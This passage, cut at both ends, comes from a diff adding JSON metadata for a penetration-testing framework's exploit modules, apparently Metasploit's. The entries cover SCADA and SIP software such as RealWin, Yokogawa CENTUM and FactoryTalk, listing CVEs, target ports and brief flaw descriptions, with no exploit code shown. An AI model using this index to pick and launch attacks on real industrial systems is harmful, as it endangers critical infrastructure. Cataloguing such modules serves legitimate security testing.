{}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_misc": { + "name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities", + "fullname": "exploit/windows/scada/igss9_misc", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "sinn3r " + ], + "description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. The initial approach is first by transferring our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.", + "references": [ + "CVE-2011-1565", + "CVE-2011-1566", + "OSVDB-72354", + "OSVDB-72349", + "URL-http://aluigi.altervista.org/adv/igss_1-adv.txt", + "URL-http://aluigi.altervista.org/adv/igss_8-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP", + "Windows 7", + "Windows Server 2003 / R2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_misc.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_misc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss_exec_17": { + "name": "Interactive Graphical SCADA System Remote Command Injection", + "fullname": "exploit/windows/scada/igss_exec_17", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.", + "references": [ + "CVE-2011-1566", + "OSVDB-72349", + "URL-http://aluigi.org/adv/igss_8-adv.txt" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 12397, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/igss_exec_17.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss_exec_17", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/indusoft_webstudio_exec": { + "name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution", + "fullname": "exploit/windows/scada/indusoft_webstudio_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.", + "references": [ + "CVE-2011-4051", + "OSVDB-77179", + "BID-50675", + "ZDI-11-330" + ], + "platform": "Windows", + "arch": "", + "rport": 4322, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP / 2003" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb", + "is_install_path": true, + "ref_name": "windows/scada/indusoft_webstudio_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/moxa_mdmtool": { + "name": "MOXA Device Manager Tool 2.1 Buffer Overflow", + "fullname": "exploit/windows/scada/moxa_mdmtool", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-20", + "type": "exploit", + "author": [ + "Ruben Santamarta", + "MC " + ], + "description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4741", + "OSVDB-69027", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-301-01A" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MOXA MDM Tool 2.1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/moxa_mdmtool.rb", + "is_install_path": true, + "ref_name": "windows/scada/moxa_mdmtool", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/mypro_cmdexe": { + "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)", + "fullname": "exploit/windows/scada/mypro_cmdexe", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-09-22", + "type": "exploit", + "author": [ + "Michael Heinzl" + ], + "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06", + "CVE-2023-28384" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-07-25 23:54:27 +0000", + "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb", + "is_install_path": true, + "ref_name": "windows/scada/mypro_cmdexe", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/mypro_mgr_cmd": { + "name": "mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)", + "fullname": "exploit/windows/scada/mypro_mgr_cmd", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-11-21", + "type": "exploit", + "author": [ + "Michael Heinzl" + ], + "description": "Unauthenticated Command Injection in MyPRO Manager <= v1.2 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of the myscada9 administrative user that is automatically added by the product.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07", + "CVE-2024-47407" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 34022, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2025-01-29 20:18:05 +0000", + "path": "/modules/exploits/windows/scada/mypro_mgr_cmd.rb", + "is_install_path": true, + "ref_name": "windows/scada/mypro_mgr_cmd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/procyon_core_server": { + "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", + "fullname": "exploit/windows/scada/procyon_core_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-08", + "type": "exploit", + "author": [ + "Knud Hojgaard ", + "mr_me " + ], + "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. Also, after the\n payload exits, Coreservice.exe should automatically recover.", + "references": [ + "CVE-2011-3322", + "OSVDB-75371", + "URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - No dep bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/procyon_core_server.rb", + "is_install_path": true, + "ref_name": "windows/scada/procyon_core_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin": { + "name": "DATAC RealWin SCADA Server Buffer Overflow", + "fullname": "exploit/windows/scada/realwin", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-09-26", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-4322", + "OSVDB-48606", + "BID-31418" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/realwin.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_on_fc_binfile_a": { + "name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_on_fc_binfile_a", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)", + "references": [ + "CVE-2011-1563", + "OSVDB-72826", + "BID-46937", + "URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_on_fc_binfile_a", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_on_fcs_login": { + "name": "RealWin SCADA Server DATAC Login Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_on_fcs_login", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC ", + "B|H " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2011-1563", + "OSVDB-72824", + "URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt", + "URL-http://www.dataconline.com/software/realwin.php", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_on_fcs_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_initialize": { + "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_initialize", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-15", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-68812", + "CVE-2010-4142", + "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" + ], + "platform": "Windows", + "arch": "", + "rport": 912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_initialize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_initialize_rf": { + "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_initialize_rf", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-15", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-68812", + "CVE-2010-4142", + "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" + ], + "platform": "Windows", + "arch": "", + "rport": 912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_initialize_rf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_txtevent": { + "name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_txtevent", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-18", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4142", + "OSVDB-68812" + ], + "platform": "Windows", + "arch": "", + "rport": 912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_txtevent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/rockwell_factorytalk_rce": { + "name": "Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/scada/rockwell_factorytalk_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-22", + "type": "exploit", + "author": [ + "Pedro Ribeiro ", + "Radek Domanski " + ], + "description": "This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n on the Rockwell FactoryTalk View SE SCADA product as the IIS user.\n The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,\n the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all\n targets, two information leak vulnerabilities are also abused.\n This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.", + "references": [ + "URL-https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md", + "URL-https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md", + "CVE-2020-12027", + "CVE-2020-12028", + "CVE-2020-12029", + "ZDI-20-727", + "ZDI-20-728", + "ZDI-20-729", + "ZDI-20-730" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Rockwell Automation FactoryTalk SE" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb", + "is_install_path": true, + "ref_name": "windows/scada/rockwell_factorytalk_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/scadapro_cmdexe": { + "name": "Measuresoft ScadaPro Remote Command Execution", + "fullname": "exploit/windows/scada/scadapro_cmdexe", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-09-16", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me ", + "TecR0c " + ], + "description": "This module allows remote attackers to execute arbitrary commands on the\n affected system by abusing via Directory Traversal attack when using the\n 'xf' command (execute function). An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.", + "references": [ + "CVE-2011-3497", + "OSVDB-75490", + "BID-49613", + "URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt", + "URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf", + "URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": 11234, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb", + "is_install_path": true, + "ref_name": "windows/scada/scadapro_cmdexe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/sunway_force_control_netdbsrv": { + "name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57", + "fullname": "exploit/windows/scada/sunway_force_control_netdbsrv", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-09-22", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Rinat Ziyayev", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.", + "references": [ + "OSVDB-75798", + "BID-49747", + "URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 2001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb", + "is_install_path": true, + "ref_name": "windows/scada/sunway_force_control_netdbsrv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/winlog_runtime": { + "name": "Sielco Sistemi Winlog Buffer Overflow", + "fullname": "exploit/windows/scada/winlog_runtime", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-01-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a buffer overflow in Sielco\n Sistem Winlog <= 2.07.00. When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2011-0517", + "OSVDB-70418", + "URL-http://aluigi.org/adv/winlog_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02" + ], + "platform": "Windows", + "arch": "", + "rport": 46823, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winlog Lite 2.07.00" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/winlog_runtime.rb", + "is_install_path": true, + "ref_name": "windows/scada/winlog_runtime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/winlog_runtime_2": { + "name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16", + "fullname": "exploit/windows/scada/winlog_runtime_2", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-04", + "type": "exploit", + "author": [ + "Michael Messner " + ], + "description": "This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.", + "references": [ + "BID-53811", + "CVE-2012-3815", + "OSVDB-82654", + "EDB-18986", + "URL-http://www.s3cur1ty.de/m1adv2012-001", + "URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html" + ], + "platform": "Windows", + "arch": "", + "rport": 46824, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", + "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/winlog_runtime_2.rb", + "is_install_path": true, + "ref_name": "windows/scada/winlog_runtime_2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkbcopyd_bof": { + "name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkbcopyd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", + "CVE-2014-0784" + ], + "platform": "Windows", + "arch": "", + "rport": 20111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkbcopyd_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkesimmgr_bof": { + "name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkesimmgr_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", + "references": [ + "CVE-2014-0782", + "URL-https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities", + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 34205, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkesimmgr_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkfsim_vhfd": { + "name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkfsim_vhfd", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-23", + "type": "exploit", + "author": [ + "Redsadic ", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.", + "references": [ + "CVE-2014-3888", + "URL-http://jvn.jp/vu/JVNVU95045914/index.html", + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 20010, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkfsim_vhfd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkhodeq_bof": { + "name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkhodeq_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", + "CVE-2014-0783" + ], + "platform": "Windows", + "arch": "", + "rport": 20171, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkhodeq_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/aim_triton_cseq": { + "name": "AIM Triton 1.0.4 CSeq Buffer Overflow", + "fullname": "exploit/windows/sip/aim_triton_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5061, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AIM Triton 1.0.4 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/aim_triton_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/aim_triton_cseq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/sipxezphone_cseq": { + "name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", + "fullname": "exploit/windows/sip/sipxezphone_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "sipXezPhone 0.35a Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/sipxezphone_cseq", + "check": 